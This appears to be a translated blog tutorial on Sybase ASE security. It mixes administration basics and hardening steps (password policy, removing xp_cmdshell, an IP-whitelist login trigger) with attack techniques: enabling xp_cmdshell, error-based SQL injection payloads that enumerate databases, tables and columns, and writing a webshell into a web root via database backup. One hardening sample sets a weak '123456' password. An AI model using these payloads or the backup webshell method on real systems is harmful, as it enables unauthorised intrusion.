Sybase Database Security

Source: Internet
Author: User
Tags: sybase, database


Introduction
The full name of Sybase is SAP Sybase Adaptive Server Enterprise (ASE, or Sybase ASE for short). It inherits the original MSSQL code base and is closely related to MSSQL. Sybase is a relational database system, a large database system for typical UNIX or Windows NT client/server environments; it uses PowerBuilder as the development tool and SAP Sybase SQL Anywhere as the client. The current version is ASE 15.7.x; the version numbering jumped directly from 12.5.5 to 15.0.0 (13 and 14 were skipped). This test uses 12.5.2, 12.5 being the most stable of the 12.x releases.

Points to note about the server layout:

Service and Port

Open ports:
  master database service: 5000
  backup service: 5001
  monitoring service: 5002
  stored procedure service: 5004
Default Databases

master: the core database of the system. It controls server operation and stores information about all user databases and related storage devices, including login names and passwords.
model: template database. When a user database is created, the system copies the model database and expands the copy to the size specified by the user.
sybsystemprocs: stores the system stored procedures.
sybsystemdb: distributed transaction management.
tempdb: holds temporary tables for temporary data.
Registered Users (logins) and Database Users
After a login is created on the SQL server, that user can legally connect to it. Login information is stored in the syslogins table of the master database. However, the login can use the tables of a database, within the limits of the permissions granted, only after it has been added to that database as a database user and granted those permissions.
Create a login:
  sp_addlogin loginame, passwd      (remove with sp_droplogin)
Create a database user:
  [dbname..]sp_adduser loginame     (loginame must be an existing login, otherwise an error is returned)
Assign permissions:
  grant all | select, insert, delete, update
    on table_name | view_name | stored_procedure_name
    to username
or
  grant all | create database, create default, create procedure, create rule, create table, create view, set proxy, set session authorization
    to username
Database User Categories
sa user, database owner, database object owner, and ordinary database user.
1) sa user: the system user, with all permissions.
2) database owner: the database owner (dbo) can operate on all objects in the database (tables, views, stored procedures, and so on).
3) database object owner: in practice this is usually the database owner.
4) ordinary database user: corresponds to public. An ordinary user can operate on an object in the database (table, view, procedure) only after the database owner has granted that user the corresponding permission on the object.
Aliases and Groups
1) alias: an alias lets a login in SQL Server access a database as an existing database user, with the same permissions as that user.
2) group: a group is a collection of database users. Permissions granted to the group control all database users in it, but additional permissions can still be granted to individual users in the group.

Role
In a database system with relatively little division of administrative work, the sa user's duties are generally split into three roles: the system administrator role (SA role), the system security officer role (SSO role), and the operator role.

Connection and Management Tools
1) isql
The isql.exe command-line client shipped with the installation. It can connect to local and network databases. Connect with:
  isql -U sa -P ""

All options are case sensitive:
  -?              displays a summary of the isql switches.
  -L              lists the servers configured locally and the servers broadcasting on the network.
  -U login_id     the login ID; it is case sensitive.
  -P password     the password for the login. If -P is omitted, isql prompts for the password. If -P is given at the end of the command line without a value, isql uses the default password (NULL). The password is case sensitive.
  -S server_name  the SQL Server instance to connect to. If no server is specified, isql connects to the default instance on the local computer. This option is required when running isql from a remote computer on the network.
  -H hostname     the host name of the client.
  -D database     the database to use.
2) Sybase SQL Advantage (official tool)
Disadvantages: a. It ships only with the complete database installation package and has version requirements.
b. Only SQL statements are supported. I personally think it is just a graphical version of isql, which is inconvenient.


(SQL.ini settings and features: http://blog.csdn.net/potato015/Article/details/2450989)
3) Sybase Central
Disadvantages: a. It ships only with the complete database installation package and has version requirements.
b. Not very powerful.

4) DBArtisan

0x01 Sybase Security
Executing System Commands
xp_cmdshell is disabled by default. When xp_cmdshell is not enabled, calling it fails (screenshot not reproduced).

Enable xp_cmdshell:
  sp_configure 'xp_cmdshell context', 0

After xp_cmdshell is enabled, commands can be run through it (screenshot not reproduced).

If the permission is insufficient, executing xp_cmdshell fails (screenshot not reproduced).

Details:
1. Running sp_configure 'xp_cmdshell context', 0 allows every login that has the sa_role role to execute xp_cmdshell. This setting is off by default.
2. The default is sp_configure 'xp_cmdshell context', 1. In testing, the login must then have a Windows account with the same user name and password, and that account must belong to the Administrators group. One detail must not be overlooked: untick "User must change password at next logon"!
3. Because MSSQL is integrated with Windows, you can log on to the database directly with a system account. Sybase needs the configuration in step 2 to achieve the same effect as MSSQL.
Comments and Union Queries
UNION is supported. Comments can be written with /* */ and --; a space can be replaced with /**/ or +, and count() is supported; however, wildcards cannot appear in subqueries.

Versions 12.5.2 and earlier do not support the TOP keyword; an injected select top N ... statement returns an error.

There is, of course, an alternative to TOP: set rowcount N.

However, set rowcount N does not seem to work with subqueries and condition clauses (screenshot not reproduced).

Multi-statement Execution
Unlike MSSQL, multiple statements are separated by spaces rather than semicolons.


Encoding Support
Same as MSSQL (screenshot not reproduced).

SQL Injection Characteristics
Using PHP as the script (screenshot not reproduced).

Using Java as the script (screenshot not reproduced).

Determine whether the database is Sybase:
  id=1 and exists (select * from master.dbo.ijdbc_function_escapes)


Note that, unlike MSSQL, Sybase does not support direct comparison of values of different types, which is what error-based injection relies on:
  id=1 and 1=user
  id=1 and 1=convert(integer, user)
  id=1 and 1=convert(integer, (select @@version))

  id=-1 union select 1, "", (select @@version)

Enumerating databases (complex version):
  id=1 and 1=convert(integer, (select min(isnull(convert(nvarchar(4000), gJyQ.name), char(32))) from (select name from master..sysdatabases) as gJyQ where convert(nvarchar(4000), gJyQ.name) > ''))
  Lists the first database (master).
  id=1 and 1=convert(integer, (select min(isnull(convert(nvarchar(4000), gJyQ.name), char(32))) from (select name from master..sysdatabases) as gJyQ where convert(nvarchar(4000), gJyQ.name) > 'master'))
  Lists the first database after master.

Enumerating databases (simple version):
  id=1 and 1=convert(integer, (select name from master..sysdatabases where dbid=1))
  Increment the value of dbid for the next database.

dbid is a contiguous sequence, so it is easy to guess.

PS: although Sybase cannot use TOP or FOR XML PATH, it does support HAVING, WHERE NOT IN, and similar syntax.
Difference from MSSQL: the sysobjects type column is xtype in MSSQL and type in Sybase.

Enumerating tables (complex version only):
  id=1 and 1=convert(integer, (select min(isnull(convert(nvarchar(4000), aaaa.name), char(32))) from (select name from test.dbo.sysobjects where type='U') as aaaa where convert(nvarchar(4000), aaaa.name) > ''))
  Lists the first table (cmd).
  id=1 and 1=convert(integer, (select min(isnull(convert(nvarchar(4000), aaaa.name), char(32))) from (select name from test.dbo.sysobjects where type='U') as aaaa where convert(nvarchar(4000), aaaa.name) > 'cmd'))
  Lists the first table after cmd.

Enumerating columns:
  select name from test..syscolumns where id=object_id('users') and colid=1
  Increment colid for the next column. That is:
  id=1 and 1=convert(integer, (select name from test..syscolumns where id=object_id('users') and colid=1))

Tool injection:

Pangolin cannot guess the database name; capturing its packets shows that it uses the TOP keyword. It seems Pangolin only supports Sybase 12.5.3 and later.

Writing a File via Backup (webshell)
Prerequisites:
1. The backup service is running.
2. The backup service allows remote access.
3. Database permission (host permission) plus write permission on the disk.
Steps:
1. create table cmd (a image)--
2. insert into cmd (a) values ('')--
3. dump database test to 'C:\wamp\www\1.php'    [full backup]
   (MSSQL equivalent: backup database dbname to disk = 'C:\wamp\www\1.php' with differential, format;--)
   dump transaction test to 'C:\wamp\www\1.php'    [log backup]
   (MSSQL equivalent: backup log dbname to disk = 'd:\www\xxx\test.asp'--)
   Note: with dump transaction, the data files and log files must not be on the same device.
4. drop table cmd--

Hardening and Prevention
Passwords
  sp_password "old password", "new password", login_name
  For example, change the sa password from NULL to 123456:
  sp_password NULL, "123456", sa
  sp_configure "minimum password length", 8            -- minimum password length
  sp_configure "check password for digit", 1           -- must contain at least one digit
  sp_configure "systemwide password expiration", 90    -- password validity period (days)
  sp_configure "maximum failed logins", 5              -- lockout threshold for wrong passwords
Remove the extended stored procedure xp_cmdshell and delete sybsyesp.dll:
  exec sp_dropextendedproc xp_cmdshell
Disable the sa account:
  sp_locklogin sa, "lock"
Disable remote access:
  exec sp_configure "allow remote access", 0
After this is disabled, many services such as backup will be unavailable.

Login IP Whitelist
The system has no built-in login restriction by address; the only option is a login trigger (login script) that implements an IP whitelist:
  create procedure login_trg
  as
  declare @ip varchar(18), @login_name varchar(20)
  begin
    select @ip = t.ipaddr, @login_name = suser_name()
      from master.dbo.sysprocesses t
     where t.spid = @@spid
    if @ip <> '192.168.0.102'
    begin
      raiserror 30000 'IP address %1!, with user %2! login failed!', @ip, @login_name
      select syb_quit()
    end
    else
      print 'Welcome!'
  end
After creating the login trigger, run:
  isql> grant execute on login_trg to loginname
  isql> sp_modifylogin loginname, "login script", login_trg
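A table-driven generalization of the whitelist trigger above, added here as an example and not code from the original post: instead of one hard-coded address, an allow-list table in master maps each login to the addresses it may connect from, and a login with no matching row is rejected (fail closed). The table and procedure names login_ip_allowlist and login_trg_allowlist, the login appuser and the sample addresses are assumptions.

```sql
-- Added example: per-login IP allow list driven by a table (names assumed).
-- Kept in master so it is reachable from the login script of any login.
use master
go
create table dbo.login_ip_allowlist (
    login_name varchar(30) not null,
    ipaddr     varchar(18) not null
)
go
-- Constructed sample rows: sa only from the DBA workstation,
-- the application login only from the application server.
insert into dbo.login_ip_allowlist values ('sa',      '192.168.0.102')
insert into dbo.login_ip_allowlist values ('appuser', '192.168.0.50')
go
create procedure dbo.login_trg_allowlist
as
begin
    declare @ip varchar(18), @login_name varchar(30)

    -- sysprocesses.ipaddr holds the client address of this session (@@spid)
    select @ip = t.ipaddr, @login_name = suser_name()
      from master.dbo.sysprocesses t
     where t.spid = @@spid

    -- Fail closed: no matching (login, address) row means no session.
    -- Procedure and table are both owned by dbo, so the caller reads the
    -- table through the ownership chain without needing a select grant.
    if not exists (select 1 from dbo.login_ip_allowlist
                    where login_name = @login_name and ipaddr = @ip)
    begin
        raiserror 30001 'Login %1! rejected from IP %2! (not on allow list)',
            @login_name, @ip
        select syb_quit()      -- terminate the session immediately
    end
end
go
-- Every login that gets this login script must be able to execute it.
grant execute on dbo.login_trg_allowlist to public
go
-- Attach the script to each login it should protect. A login script runs
-- only after a successful password check, so wrong-password attempts never
-- reach it; those are only visible through the audit log settings.
sp_modifylogin sa, "login script", login_trg_allowlist
go
sp_modifylogin appuser, "login script", login_trg_allowlist
go
```

Because the check runs post-authentication, keep the lockout and audit settings enabled as well; the trigger only limits where a valid password can be used from.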

Logs
  isql> exec sp_configure "log audit logon failure", 1   -- record failed logins
  isql> exec sp_configure "log audit logon success", 1   -- record successful logins